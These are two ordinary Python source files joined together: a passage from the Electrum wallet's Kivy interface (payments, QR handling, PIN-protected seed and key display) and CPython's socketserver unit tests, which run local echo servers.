if not amount_str:
return ''
if not self.fx.is_enabled():
return ''
rate = self.fx.exchange_rate()
if rate.is_nan():
return ''
fiat_amount = self.get_amount(amount_str + ' ' + self.base_unit) * rate / pow(10, 8)
return "{:.2f}".format(fiat_amount).rstrip('0').rstrip('.')
def fiat_to_btc(self, fiat_amount):
if not fiat_amount:
return ''
rate = self.fx.exchange_rate()
if rate.is_nan():
return ''
satoshis = int(pow(10,8) * Decimal(fiat_amount) / Decimal(rate))
return format_satoshis_plain(satoshis, self.decimal_point())
def get_amount(self, amount_str):
a, u = amount_str.split()
assert u == self.base_unit
try:
x = Decimal(a)
except:
return None
p = pow(10, self.decimal_point())
return int(p * x)
_orientation = OptionProperty('landscape',
options=('landscape', 'portrait'))
def _get_orientation(self):
return self._orientation
orientation = AliasProperty(_get_orientation,
None,
bind=('_orientation',))
'''Tries to ascertain the kind of device the app is running on.
Cane be one of `tablet` or `phone`.
:data:`orientation` is a read only `AliasProperty` Defaults to 'landscape'
'''
_ui_mode = OptionProperty('phone', options=('tablet', 'phone'))
def _get_ui_mode(self):
return self._ui_mode
ui_mode = AliasProperty(_get_ui_mode,
None,
bind=('_ui_mode',))
'''Defines tries to ascertain the kind of device the app is running on.
Cane be one of `tablet` or `phone`.
:data:`ui_mode` is a read only `AliasProperty` Defaults to 'phone'
'''
def __init__(self, **kwargs):
# initialize variables
self._clipboard = Clipboard
self.info_bubble = None
self.nfcscanner = None
self.tabs = None
self.is_exit = False
self.wallet = None
App.__init__(self)#, **kwargs)
title = _('Electrum App')
self.electrum_config = config = kwargs.get('config', None)
self.language = config.get('language', 'en')
self.network = network = kwargs.get('network', None)
if self.network:
self.num_blocks = self.network.get_local_height()
self.num_nodes = len(self.network.get_interfaces())
host, port, protocol, proxy_config, auto_connect = self.network.get_parameters()
self.server_host = host
self.server_port = port
self.auto_connect = auto_connect
self.proxy_config = proxy_config if proxy_config else {}
self.plugins = kwargs.get('plugins', [])
self.gui_object = kwargs.get('gui_object', None)
self.daemon = self.gui_object.daemon
self.fx = self.daemon.fx
self.use_rbf = config.get('use_rbf', True)
self.use_change = config.get('use_change', True)
self.use_unconfirmed = not config.get('confirmed_only', False)
# create triggers so as to minimize updation a max of 2 times a sec
self._trigger_update_wallet = Clock.create_trigger(self.update_wallet, .5)
self._trigger_update_status = Clock.create_trigger(self.update_status, .5)
self._trigger_update_history = Clock.create_trigger(self.update_history, .5)
self._trigger_update_interfaces = Clock.create_trigger(self.update_interfaces, .5)
# cached dialogs
self._settings_dialog = None
self._password_dialog = None
self.fee_status = self.electrum_config.get_fee_status()
def wallet_name(self):
return os.path.basename(self.wallet.storage.path) if self.wallet else ' '
def on_pr(self, pr):
if pr.verify(self.wallet.contacts):
key = self.wallet.invoices.add(pr)
if self.invoices_screen:
self.invoices_screen.update()
status = self.wallet.invoices.get_status(key)
if status == PR_PAID:
self.show_error("invoice already paid")
self.send_screen.do_clear()
else:
if pr.has_expired():
self.show_error(_('Payment request has expired'))
else:
self.switch_to('send')
self.send_screen.set_request(pr)
else:
self.show_error("invoice error:" + pr.error)
self.send_screen.do_clear()
def on_qr(self, data):
from electrum.bitcoin import base_decode, is_address
data = data.strip()
if is_address(data):
self.set_URI(data)
return
if data.startswith('bitcoin:'):
self.set_URI(data)
return
# try to decode transaction
from electrum.transaction import Transaction
from electrum.util import bh2u
try:
text = bh2u(base_decode(data, None, base=43))
tx = Transaction(text)
tx.deserialize()
except:
tx = None
if tx:
self.tx_dialog(tx)
return
# show error
self.show_error("Unable to decode QR data")
def update_tab(self, name):
s = getattr(self, name + '_screen', None)
if s:
s.update()
@profiler
def update_tabs(self):
for tab in ['invoices', 'send', 'history', 'receive', 'address']:
self.update_tab(tab)
def switch_to(self, name):
s = getattr(self, name + '_screen', None)
if s is None:
s = self.tabs.ids[name + '_screen']
s.load_screen()
panel = self.tabs.ids.panel
tab = self.tabs.ids[name + '_tab']
panel.switch_to(tab)
def show_request(self, addr):
self.switch_to('receive')
self.receive_screen.screen.address = addr
def show_pr_details(self, req, status, is_invoice):
from electrum.util import format_time
requestor = req.get('requestor')
exp = req.get('exp')
memo = req.get('memo')
amount = req.get('amount')
fund = req.get('fund')
popup = Builder.load_file('gui/kivy/uix/ui_screens/invoice.kv')
popup.is_invoice = is_invoice
popup.amount = amount
popup.requestor = requestor if is_invoice else req.get('address')
popup.exp = format_time(exp) if exp else ''
popup.description = memo if memo else ''
popup.signature = req.get('signature', '')
popup.status = status
popup.fund = fund if fund else 0
txid = req.get('txid')
popup.tx_hash = txid or ''
popup.on_open = lambda: popup.ids.output_list.update(req.get('outputs', []))
popup.export = self.export_private_keys
popup.open()
def show_addr_details(self, req, status):
from electrum.util import format_time
fund = req.get('fund')
isaddr = 'y'
popup = Builder.load_file('gui/kivy/uix/ui_screens/invoice.kv')
popup.isaddr = isaddr
popup.is_invoice = False
popup.status = status
popup.requestor = req.get('address')
popup.fund = fund if fund else 0
popup.export = self.export_private_keys
popup.open()
def qr_dialog(self, title, data, show_text=False):
from .uix.dialogs.qr_dialog import QRDialog
popup = QRDialog(title, data, show_text)
popup.open()
def scan_qr(self, on_complete):
if platform != 'android':
return
from jnius import autoclass, cast
from android import activity
PythonActivity = autoclass('org.kivy.android.PythonActivity')
SimpleScannerActivity = autoclass("org.electrum.qr.SimpleScannerActivity")
Intent = autoclass('android.content.Intent')
intent = Intent(PythonActivity.mActivity, SimpleScannerActivity)
def on_qr_result(requestCode, resultCode, intent):
if resultCode == -1: # RESULT_OK:
# this doesn't work due to some bug in jnius:
# contents = intent.getStringExtra("text")
String = autoclass("java.lang.String")
contents = intent.getStringExtra(String("text"))
on_complete(contents)
activity.bind(on_activity_result=on_qr_result)
PythonActivity.mActivity.startActivityForResult(intent, 0)
def do_share(self, data, title):
if platform != 'android':
return
from jnius import autoclass, cast
JS = autoclass('java.lang.String')
Intent = autoclass('android.content.Intent')
sendIntent = Intent()
sendIntent.setAction(Intent.ACTION_SEND)
sendIntent.setType("text/plain")
sendIntent.putExtra(Intent.EXTRA_TEXT, JS(data))
PythonActivity = autoclass('org.kivy.android.PythonActivity')
currentActivity = cast('android.app.Activity', PythonActivity.mActivity)
it = Intent.createChooser(sendIntent, cast('java.lang.CharSequence', JS(title)))
currentActivity.startActivity(it)
def build(self):
return Builder.load_file('gui/kivy/main.kv')
def _pause(self):
if platform == 'android':
# move activity to back
from jnius import autoclass
python_act = autoclass('org.kivy.android.PythonActivity')
mActivity = python_act.mActivity
mActivity.moveTaskToBack(True)
def on_start(self):
''' This is the start point of the kivy ui
'''
import time
Logger.info('Time to on_start: {} <<<<<<<<'.format(time.clock()))
win = Window
win.bind(size=self.on_size, on_keyboard=self.on_keyboard)
win.bind(on_key_down=self.on_key_down)
#win.softinput_mode = 'below_target'
self.on_size(win, win.size)
self.init_ui()
self.load_wallet_by_name(self.electrum_config.get_wallet_path())
# init plugins
run_hook('init_kivy', self)
# fiat currency
self.fiat_unit = self.fx.ccy if self.fx.is_enabled() else ''
# default tab
self.switch_to('history')
# bind intent for bitcoin: URI scheme
if platform == 'android':
from android import activity
from jnius import autoclass
PythonActivity = autoclass('org.kivy.android.PythonActivity')
mactivity = PythonActivity.mActivity
self.on_new_intent(mactivity.getIntent())
activity.bind(on_new_intent=self.on_new_intent)
# connect callbacks
if self.network:
interests = ['updated', 'status', 'new_transaction', 'verified', 'interfaces']
self.network.register_callback(self.on_network_event, interests)
self.network.register_callback(self.on_fee, ['fee'])
self.network.register_callback(self.on_quotes, ['on_quotes'])
self.network.register_callback(self.on_history, ['on_history'])
# URI passed in config
uri = self.electrum_config.get('url')
if uri:
self.set_URI(uri)
def get_wallet_path(self):
if self.wallet:
return self.wallet.storage.path
else:
return ''
def on_wizard_complete(self, instance, wallet):
if wallet:
wallet.start_threads(self.daemon.network)
self.daemon.add_wallet(wallet)
self.load_wallet(wallet)
self.on_resume()
def load_wallet_by_name(self, path):
if not path:
return
wallet = self.daemon.load_wallet(path, None)
if wallet:
if wallet != self.wallet:
self.stop_wallet()
self.load_wallet(wallet)
self.on_resume()
else:
Logger.debug('Electrum: Wallet not found. Launching install wizard')
storage = WalletStorage(path)
wizard = Factory.InstallWizard(self.electrum_config, storage)
wizard.bind(on_wizard_complete=self.on_wizard_complete)
action = wizard.storage.get_action()
wizard.run(action)
def on_stop(self):
self.stop_wallet()
def stop_wallet(self):
if self.wallet:
self.daemon.stop_wallet(self.wallet.storage.path)
self.wallet = None
def on_key_down(self, instance, key, keycode, codepoint, modifiers):
if 'ctrl' in modifiers:
# q=24 w=25
if keycode in (24, 25):
self.stop()
elif keycode == 27:
# r=27
# force update wallet
self.update_wallet()
elif keycode == 112:
# pageup
#TODO move to next tab
pass
elif keycode == 117:
# pagedown
#TODO move to prev tab
pass
#TODO: alt+tab_number to activate the particular tab
def on_keyboard(self, instance, key, keycode, codepoint, modifiers):
if key == 27 and self.is_exit is False:
self.is_exit = True
self.show_info(_('Press again to exit'))
return True
# override settings button
if key in (319, 282): #f1/settings button on android
#self.gui.main_gui.toggle_settings(self)
return True
def settings_dialog(self):
from .uix.dialogs.settings import SettingsDialog
if self._settings_dialog is None:
self._settings_dialog = SettingsDialog(self)
self._settings_dialog.update()
self._settings_dialog.open()
def popup_dialog(self, name):
if name == 'settings':
self.settings_dialog()
elif name == 'wallets':
from .uix.dialogs.wallets import WalletDialog
d = WalletDialog()
d.open()
else:
popup = Builder.load_file('gui/kivy/uix/ui_screens/'+name+'.kv')
popup.open()
@profiler
def init_ui(self):
''' Initialize The Ux part of electrum. This function performs the basic
tasks of setting up the ui.
'''
#from weakref import ref
self.funds_error = False
# setup UX
self.screens = {}
#setup lazy imports for mainscreen
Factory.register('AnimatedPopup',
module='electrum_gui.kivy.uix.dialogs')
Factory.register('QRCodeWidget',
module='electrum_gui.kivy.uix.qrcodewidget')
# preload widgets. Remove this if you want to load the widgets on demand
#Cache.append('electrum_widgets', 'AnimatedPopup', Factory.AnimatedPopup())
#Cache.append('electrum_widgets', 'QRCodeWidget', Factory.QRCodeWidget())
# load and focus the ui
self.root.manager = self.root.ids['manager']
self.history_screen = None
self.contacts_screen = None
self.send_screen = None
self.invoices_screen = None
self.receive_screen = None
self.requests_screen = None
self.address_screen = None
self.icon = "icons/electrum.png"
self.tabs = self.root.ids['tabs']
def update_interfaces(self, dt):
self.num_nodes = len(self.network.get_interfaces())
self.num_chains = len(self.network.get_blockchains())
chain = self.network.blockchain()
self.blockchain_checkpoint = chain.get_checkpoint()
self.blockchain_name = chain.get_name()
if self.network.interface:
self.server_host = self.network.interface.host
def on_network_event(self, event, *args):
Logger.info('network event: '+ event)
if event == 'interfaces':
self._trigger_update_interfaces()
elif event == 'updated':
self._trigger_update_wallet()
self._trigger_update_status()
elif event == 'status':
self._trigger_update_status()
elif event == 'new_transaction':
self._trigger_update_wallet()
elif event == 'verified':
self._trigger_update_wallet()
@profiler
def load_wallet(self, wallet):
self.wallet = wallet
self.update_wallet()
# Once GUI has been initialized check if we want to announce something
# since the callback has been called before the GUI was initialized
if self.receive_screen:
self.receive_screen.clear()
self.update_tabs()
run_hook('load_wallet', wallet, self)
def update_status(self, *dt):
self.num_blocks = self.network.get_local_height()
if not self.wallet:
self.status = _("No Wallet")
return
if self.network is None or not self.network.is_running():
status = _("Offline")
elif self.network.is_connected():
server_height = self.network.get_server_height()
server_lag = self.network.get_local_height() - server_height
if not self.wallet.up_to_date or server_height == 0:
status = _("Synchronizing...")
elif server_lag > 1:
status = _("Server lagging")
else:
status = ''
else:
status = _("Disconnected")
self.status = self.wallet.basename() + (' [size=15dp](%s)[/size]'%status if status else '')
# balance
c, u, x = self.wallet.get_balance()
text = self.format_amount(c+x+u)
self.balance = str(text.strip()) + ' [size=22dp]%s[/size]'% self.base_unit
self.fiat_balance = self.fx.format_amount(c+u+x) + ' [size=22dp]%s[/size]'% self.fx.ccy
def get_max_amount(self):
inputs = self.wallet.get_spendable_coins(None, self.electrum_config)
addr = str(self.send_screen.screen.address) or self.wallet.dummy_address()
outputs = [(TYPE_ADDRESS, addr, '!')]
tx = self.wallet.make_unsigned_transaction(inputs, outputs, self.electrum_config)
amount = tx.output_value()
return format_satoshis_plain(amount, self.decimal_point())
def format_amount(self, x, is_diff=False, whitespaces=False):
return format_satoshis(x, is_diff, 0, self.decimal_point(), whitespaces)
def format_amount_and_units(self, x):
return format_satoshis_plain(x, self.decimal_point()) + ' ' + self.base_unit
#@profiler
def update_wallet(self, *dt):
self._trigger_update_status()
if self.wallet and (self.wallet.up_to_date or not self.network or not self.network.is_connected()):
self.update_tabs()
def notify(self, message):
try:
global notification, os
if not notification:
from plyer import notification
icon = (os.path.dirname(os.path.realpath(__file__))
+ '/../../' + self.icon)
notification.notify('Electrum', message,
app_icon=icon, app_name='Electrum')
except ImportError:
Logger.Error('Notification: needs plyer; `sudo pip install plyer`')
def on_pause(self):
# pause nfc
if self.nfcscanner:
self.nfcscanner.nfc_disable()
return True
def on_resume(self):
if self.nfcscanner:
self.nfcscanner.nfc_enable()
def on_size(self, instance, value):
width, height = value
self._orientation = 'landscape' if width > height else 'portrait'
self._ui_mode = 'tablet' if min(width, height) > inch(3.51) else 'phone'
def on_ref_label(self, label, touch):
if label.touched:
label.touched = False
self.qr_dialog(label.name, label.data, True)
else:
label.touched = True
self._clipboard.copy(label.data)
Clock.schedule_once(lambda dt: self.show_info(_('Text copied to clipboard.\nTap again to display it as QR code.')))
def set_send(self, address, amount, label, message):
self.send_payment(address, amount=amount, label=label, message=message)
def show_error(self, error, width='200dp', pos=None, arrow_pos=None,
exit=False, icon='atlas://gui/kivy/theming/light/error', duration=0,
modal=False):
''' Show a error Message Bubble.
'''
self.show_info_bubble( text=error, icon=icon, width=width,
pos=pos or Window.center, arrow_pos=arrow_pos, exit=exit,
duration=duration, modal=modal)
def show_info(self, error, width='200dp', pos=None, arrow_pos=None,
exit=False, duration=0, modal=False):
''' Show a Info Message Bubble.
'''
self.show_error(error, icon='atlas://gui/kivy/theming/light/important',
duration=duration, modal=modal, exit=exit, pos=pos,
arrow_pos=arrow_pos)
def show_info_bubble(self, text=_('Hello World'), pos=None, duration=0,
arrow_pos='bottom_mid', width=None, icon='', modal=False, exit=False):
'''Method to show a Information Bubble
.. parameters::
text: Message to be displayed
pos: position for the bubble
duration: duration the bubble remains on screen. 0 = click to hide
width: width of the Bubble
arrow_pos: arrow position for the bubble
'''
info_bubble = self.info_bubble
if not info_bubble:
info_bubble = self.info_bubble = Factory.InfoBubble()
win = Window
if info_bubble.parent:
win.remove_widget(info_bubble
if not info_bubble.modal else
info_bubble._modal_view)
if not arrow_pos:
info_bubble.show_arrow = False
else:
info_bubble.show_arrow = True
info_bubble.arrow_pos = arrow_pos
img = info_bubble.ids.img
if text == 'texture':
# icon holds a texture not a source image
# display the texture in full screen
text = ''
img.texture = icon
info_bubble.fs = True
info_bubble.show_arrow = False
img.allow_stretch = True
info_bubble.dim_background = True
info_bubble.background_image = 'atlas://gui/kivy/theming/light/card'
else:
info_bubble.fs = False
info_bubble.icon = icon
#if img.texture and img._coreimage:
# img.reload()
img.allow_stretch = False
info_bubble.dim_background = False
info_bubble.background_image = 'atlas://data/images/defaulttheme/bubble'
info_bubble.message = text
if not pos:
pos = (win.center[0], win.center[1] - (info_bubble.height/2))
info_bubble.show(pos, duration, width, modal=modal, exit=exit)
def tx_dialog(self, tx):
from .uix.dialogs.tx_dialog import TxDialog
d = TxDialog(self, tx)
d.open()
def sign_tx(self, *args):
threading.Thread(target=self._sign_tx, args=args).start()
def _sign_tx(self, tx, password, on_success, on_failure):
try:
self.wallet.sign_transaction(tx, password)
except InvalidPassword:
Clock.schedule_once(lambda dt: on_failure(_("Invalid PIN")))
return
Clock.schedule_once(lambda dt: on_success(tx))
def _broadcast_thread(self, tx, on_complete):
ok, txid = self.network.broadcast(tx)
Clock.schedule_once(lambda dt: on_complete(ok, txid))
def broadcast(self, tx, pr=None):
def on_complete(ok, msg):
if ok:
self.show_info(_('Payment sent.'))
if self.send_screen:
self.send_screen.do_clear()
if pr:
self.wallet.invoices.set_paid(pr, tx.txid())
self.wallet.invoices.save()
self.update_tab('invoices')
else:
self.show_error(msg)
if self.network and self.network.is_connected():
self.show_info(_('Sending'))
threading.Thread(target=self._broadcast_thread, args=(tx, on_complete)).start()
else:
self.show_info(_('Cannot broadcast transaction') + ':\n' + _('Not connected'))
def description_dialog(self, screen):
from .uix.dialogs.label_dialog import LabelDialog
text = screen.message
def callback(text):
screen.message = text
d = LabelDialog(_('Enter description'), text, callback)
d.open()
def amount_dialog(self, screen, show_max):
from .uix.dialogs.amount_dialog import AmountDialog
amount = screen.amount
if amount:
amount, u = str(amount).split()
assert u == self.base_unit
def cb(amount):
screen.amount = amount
popup = AmountDialog(show_max, amount, cb)
popup.open()
def invoices_dialog(self, screen):
from .uix.dialogs.invoices import InvoicesDialog
if len(self.wallet.invoices.sorted_list()) == 0:
self.show_info(' '.join([
_('No saved invoices.'),
_('Signed invoices are saved automatically when you scan them.'),
_('You may also save unsigned requests or contact addresses using the save button.')
]))
return
popup = InvoicesDialog(self, screen, None)
popup.update()
popup.open()
def requests_dialog(self, screen):
from .uix.dialogs.requests import RequestsDialog
if len(self.wallet.get_sorted_requests(self.electrum_config)) == 0:
self.show_info(_('No saved requests.'))
return
popup = RequestsDialog(self, screen, None)
popup.update()
popup.open()
def addresses_dialog(self, screen):
from .uix.dialogs.addresses import AddressesDialog
popup = AddressesDialog(self, screen, None)
popup.update()
popup.open()
def fee_dialog(self, label, dt):
from .uix.dialogs.fee_dialog import FeeDialog
def cb():
self.fee_status = self.electrum_config.get_fee_status()
fee_dialog = FeeDialog(self, self.electrum_config, cb)
fee_dialog.open()
def on_fee(self, event, *arg):
self.fee_status = self.electrum_config.get_fee_status()
def protected(self, msg, f, args):
if self.wallet.has_password():
self.password_dialog(msg, f, args)
else:
f(*(args + (None,)))
def delete_wallet(self):
from .uix.dialogs.question import Question
basename = os.path.basename(self.wallet.storage.path)
d = Question(_('Delete wallet?') + '\n' + basename, self._delete_wallet)
d.open()
def _delete_wallet(self, b):
if b:
basename = os.path.basename(self.wallet.storage.path)
self.protected(_("Enter your PIN code to confirm deletion of {}").format(basename), self.__delete_wallet, ())
def __delete_wallet(self, pw):
wallet_path = self.get_wallet_path()
dirname = os.path.dirname(wallet_path)
basename = os.path.basename(wallet_path)
if self.wallet.has_password():
try:
self.wallet.check_password(pw)
except:
self.show_error("Invalid PIN")
return
self.stop_wallet()
os.unlink(wallet_path)
self.show_error("Wallet removed:" + basename)
d = os.listdir(dirname)
name = 'default_wallet'
new_path = os.path.join(dirname, name)
self.load_wallet_by_name(new_path)
def show_seed(self, label):
self.protected(_("Enter your PIN code in order to decrypt your seed"), self._show_seed, (label,))
def _show_seed(self, label, password):
if self.wallet.has_password() and password is None:
return
keystore = self.wallet.keystore
try:
seed = keystore.get_seed(password)
passphrase = keystore.get_passphrase(password)
except:
self.show_error("Invalid PIN")
return
label.text = _('Seed') + ':\n' + seed
if passphrase:
label.text += '\n\n' + _('Passphrase') + ': ' + passphrase
def change_password(self, cb):
if self.wallet.has_password():
self.protected(_("Changing PIN code.") + '\n' + _("Enter your current PIN:"), self._change_password, (cb,))
else:
self._change_password(cb, None)
def _change_password(self, cb, old_password):
if self.wallet.has_password():
if old_password is None:
return
try:
self.wallet.check_password(old_password)
except InvalidPassword:
self.show_error("Invalid PIN")
return
self.password_dialog(_('Enter new PIN'), self._change_password2, (cb, old_password,))
def _change_password2(self, cb, old_password, new_password):
self.password_dialog(_('Confirm new PIN'), self._change_password3, (cb, old_password, new_password))
def _change_password3(self, cb, old_password, new_password, confirmed_password):
if new_password == confirmed_password:
self.wallet.update_password(old_password, new_password)
cb()
else:
self.show_error("PIN numbers do not match")
def password_dialog(self, msg, f, args):
from .uix.dialogs.password_dialog import PasswordDialog
def callback(pw):
Clock.schedule_once(lambda x: f(*(args + (pw,))), 0.1)
if self._password_dialog is None:
self._password_dialog = PasswordDialog()
self._password_dialog.init(msg, callback)
self._password_dialog.open()
def export_private_keys(self, pk_label, addr):
if self.wallet.is_watching_only():
self.show_info(_('This is a watching-only wallet. It does not contain private keys.'))
return
def show_private_key(addr, pk_label, password):
if self.wallet.has_password() and password is None:
return
if not self.wallet.can_export():
return
try:
key = str(self.wallet.export_private_key(addr, password)[0])
pk_label.data = key
except InvalidPassword:
self.show_error("Invalid PIN")
return
self.protected(_("Enter your PIN code in order to decrypt your private key"), show_private_key, (addr, pk_label))
|
test_socketserver.py
|
"""
Test suite for socketserver.
"""
import contextlib
import io
import os
import select
import signal
import socket
import tempfile
import unittest
import socketserver
import test.support
from test.support import reap_children, reap_threads, verbose
try:
import _thread
import threading
except ImportError:
threading = None
test.support.requires("network")
TEST_STR = b"hello world\n"
HOST = test.support.HOST
HAVE_UNIX_SOCKETS = hasattr(socket, "AF_UNIX")
requires_unix_sockets = unittest.skipUnless(HAVE_UNIX_SOCKETS,
'requires Unix sockets')
HAVE_FORKING = hasattr(os, "fork")
requires_forking = unittest.skipUnless(HAVE_FORKING, 'requires forking')
def signal_alarm(n):
"""Call signal.alarm when it exists (i.e. not on Windows)."""
if hasattr(signal, 'alarm'):
signal.alarm(n)
# Remember real select() to avoid interferences with mocking
_real_select = select.select
def receive(sock, n, timeout=20):
r, w, x = _real_select([sock], [], [], timeout)
if sock in r:
return sock.recv(n)
else:
raise RuntimeError("timed out on %r" % (sock,))
if HAVE_UNIX_SOCKETS and HAVE_FORKING:
class ForkingUnixStreamServer(socketserver.ForkingMixIn,
socketserver.UnixStreamServer):
_block_on_close = True
class ForkingUnixDatagramServer(socketserver.ForkingMixIn,
socketserver.UnixDatagramServer):
_block_on_close = True
@contextlib.contextmanager
def simple_subprocess(testcase):
"""Tests that a custom child process is not waited on (Issue 1540386)"""
pid = os.fork()
if pid == 0:
# Don't raise an exception; it would be caught by the test harness.
os._exit(72)
try:
yield None
except:
raise
finally:
pid2, status = os.waitpid(pid, 0)
testcase.assertEqual(pid2, pid)
testcase.assertEqual(72 << 8, status)
@unittest.skipUnless(threading, 'Threading required for this test.')
class SocketServerTest(unittest.TestCase):
"""Test all socket servers."""
def setUp(self):
signal_alarm(60) # Kill deadlocks after 60 seconds.
self.port_seed = 0
self.test_files = []
def tearDown(self):
signal_alarm(0) # Didn't deadlock.
reap_children()
for fn in self.test_files:
try:
os.remove(fn)
except OSError:
pass
self.test_files[:] = []
def pickaddr(self, proto):
if proto == socket.AF_INET:
return (HOST, 0)
else:
# XXX: We need a way to tell AF_UNIX to pick its own name
# like AF_INET provides port==0.
dir = None
fn = tempfile.mktemp(prefix='unix_socket.', dir=dir)
self.test_files.append(fn)
return fn
def make_server(self, addr, svrcls, hdlrbase):
class MyServer(svrcls):
_block_on_close = True
def handle_error(self, request, client_address):
self.close_request(request)
raise
class MyHandler(hdlrbase):
def handle(self):
line = self.rfile.readline()
self.wfile.write(line)
if verbose: print("creating server")
server = MyServer(addr, MyHandler)
self.assertEqual(server.server_address, server.socket.getsockname())
return server
@reap_threads
def run_server(self, svrcls, hdlrbase, testfunc):
server = self.make_server(self.pickaddr(svrcls.address_family),
svrcls, hdlrbase)
# We had the OS pick a port, so pull the real address out of
# the server.
addr = server.server_address
if verbose:
print("ADDR =", addr)
print("CLASS =", svrcls)
t = threading.Thread(
name='%s serving' % svrcls,
target=server.serve_forever,
# Short poll interval to make the test finish quickly.
# Time between requests is short enough that we won't wake
# up spuriously too many times.
kwargs={'poll_interval':0.01})
t.daemon = True # In case this function raises.
t.start()
if verbose: print("server running")
for i in range(3):
if verbose: print("test client", i)
testfunc(svrcls.address_family, addr)
if verbose: print("waiting for server")
server.shutdown()
t.join()
server.server_close()
self.assertEqual(-1, server.socket.fileno())
if HAVE_FORKING and isinstance(server, socketserver.ForkingMixIn):
# bpo-31151: Check that ForkingMixIn.server_close() waits until
# all children completed
self.assertFalse(server.active_children)
if verbose: print("done")
def stream_examine(self, proto, addr):
s = socket.socket(proto, socket.SOCK_STREAM)
s.connect(addr)
s.sendall(TEST_STR)
buf = data = receive(s, 100)
while data and b'\n' not in buf:
data = receive(s, 100)
buf += data
self.assertEqual(buf, TEST_STR)
s.close()
def dgram_examine(self, proto, addr):
s = socket.socket(proto, socket.SOCK_DGRAM)
if HAVE_UNIX_SOCKETS and proto == socket.AF_UNIX:
s.bind(self.pickaddr(proto))
s.sendto(TEST_STR, addr)
buf = data = receive(s, 100)
while data and b'\n' not in buf:
data = receive(s, 100)
buf += data
self.assertEqual(buf, TEST_STR)
s.close()
def test_TCPServer(self):
self.run_server(socketserver.TCPServer,
socketserver.StreamRequestHandler,
self.stream_examine)
def test_ThreadingTCPServer(self):
self.run_server(socketserver.ThreadingTCPServer,
socketserver.StreamRequestHandler,
self.stream_examine)
@requires_forking
def test_ForkingTCPServer(self):
with simple_subprocess(self):
self.run_server(socketserver.ForkingTCPServer,
socketserver.StreamRequestHandler,
self.stream_examine)
@requires_unix_sockets
def test_UnixStreamServer(self):
self.run_server(socketserver.UnixStreamServer,
socketserver.StreamRequestHandler,
self.stream_examine)
@requires_unix_sockets
def test_ThreadingUnixStreamServer(self):
self.run_server(socketserver.ThreadingUnixStreamServer,
socketserver.StreamRequestHandler,
self.stream_examine)
@requires_unix_sockets
@requires_forking
def test_ForkingUnixStreamServer(self):
with simple_subprocess(self):
self.run_server(ForkingUnixStreamServer,
socketserver.StreamRequestHandler,
self.stream_examine)
def test_UDPServer(self):
self.run_server(socketserver.UDPServer,
socketserver.DatagramRequestHandler,
self.dgram_examine)
def test_ThreadingUDPServer(self):
self.run_server(socketserver.ThreadingUDPServer,
socketserver.DatagramRequestHandler,
self.dgram_examine)
@requires_forking
def test_ForkingUDPServer(self):
with simple_subprocess(self):
self.run_server(socketserver.ForkingUDPServer,
socketserver.DatagramRequestHandler,
self.dgram_examine)
@requires_unix_sockets
def test_UnixDatagramServer(self):
self.run_server(socketserver.UnixDatagramServer,
socketserver.DatagramRequestHandler,
self.dgram_examine)
@requires_unix_sockets
def test_ThreadingUnixDatagramServer(self):
self.run_server(socketserver.ThreadingUnixDatagramServer,
socketserver.DatagramRequestHandler,
self.dgram_examine)
@requires_unix_sockets
@requires_forking
def test_ForkingUnixDatagramServer(self):
self.run_server(ForkingUnixDatagramServer,
socketserver.DatagramRequestHandler,
self.dgram_examine)
@reap_threads
def test_shutdown(self):
# Issue #2302: shutdown() should always succeed in making an
# other thread leave serve_forever().
class MyServer(socketserver.TCPServer):
pass
class MyHandler(socketserver.StreamRequestHandler):
pass
threads = []
for i in range(20):
s = MyServer((HOST, 0), MyHandler)
t = threading.Thread(
name='MyServer serving',
target=s.serve_forever,
kwargs={'poll_interval':0.01})
t.daemon = True # In case this function raises.
threads.append((t, s))
for t, s in threads:
t.start()
s.shutdown()
for t, s in threads:
t.join()
s.server_close()
def test_tcpserver_bind_leak(self):
# Issue #22435: the server socket wouldn't be closed if bind()/listen()
# failed.
# Create many servers for which bind() will fail, to see if this result
# in FD exhaustion.
for i in range(1024):
with self.assertRaises(OverflowError):
socketserver.TCPServer((HOST, -1),
socketserver.StreamRequestHandler)
def test_context_manager(self):
with socketserver.TCPServer((HOST, 0),
socketserver.StreamRequestHandler) as server:
pass
self.assertEqual(-1, server.socket.fileno())
class ErrorHandlerTest(unittest.TestCase):
"""Test that the servers pass normal exceptions from the handler to
handle_error(), and that exiting exceptions like SystemExit and
KeyboardInterrupt are not passed."""
def tearDown(self):
test.support.unlink(test.support.TESTFN)
reap_children()
def test_sync_handled(self):
BaseErrorTestServer(ValueError)
self.check_result(handled=True)
def test_sync_not_handled(self):
with self.assertRaises(SystemExit):
BaseErrorTestServer(SystemExit)
self.check_result(handled=False)
@unittest.skipUnless(threading, 'Threading required for this test.')
def test_threading_handled(self):
ThreadingErrorTestServer(ValueError)
self.check_result(handled=True)
@unittest.skipUnless(threading, 'Threading required for this test.')
def test_threading_not_handled(self):
ThreadingErrorTestServer(SystemExit)
self.check_result(handled=False)
@requires_forking
def test_forking_handled(self):
ForkingErrorTestServer(ValueError)
self.check_result(handled=True)
@requires_forking
def test_forking_not_handled(self):
ForkingErrorTestServer(SystemExit)
self.check_result(handled=False)
def check_result(self, handled):
with open(test.support.TESTFN) as log:
expected = 'Handler called\n' + 'Error handled\n' * handled
self.assertEqual(log.read(), expected)
class BaseErrorTestServer(socketserver.TCPServer):
_block_on_close = True
def __init__(self, exception):
self.exception = exception
super().__init__((HOST, 0), BadHandler)
with socket.create_connection(self.server_address):
pass
try:
self.handle_request()
finally:
self.server_close()
self.wait_done()
def handle_error(self, request, client_address):
with open(test.support.TESTFN, 'a') as log:
log.write('Error handled\n')
def wait_done(self):
pass
class BadHandler(socketserver.BaseRequestHandler):
def handle(self):
with open(test.support.TESTFN, 'a') as log:
log.write('Handler called\n')
raise self.server.exception('Test error')
class ThreadingErrorTestServer(socketserver.ThreadingMixIn,
BaseErrorTestServer):
def __init__(self, *pos, **kw):
self.done = threading.Event()
super().__init__(*pos, **kw)
def shutdown_request(self, *pos, **kw):
super().shutdown_request(*pos, **kw)
self.done.set()
def wait_done(self):
self.done.wait()
if HAVE_FORKING:
class ForkingErrorTestServer(socketserver.ForkingMixIn, BaseErrorTestServer):
_block_on_close = True
class SocketWriterTest(unittest.TestCase):
def test_basics(self):
class Handler(socketserver.StreamRequestHandler):
def handle(self):
self.server.wfile = self.wfile
self.server.wfile_fileno = self.wfile.fileno()
self.server.request_fileno = self.request.fileno()
server = socketserver.TCPServer((HOST, 0), Handler)
self.addCleanup(server.server_close)
s = socket.socket(
server.address_family, socket.SOCK_STREAM, socket.IPPROTO_TCP)
with s:
s.connect(server.server_address)
server.handle_request()
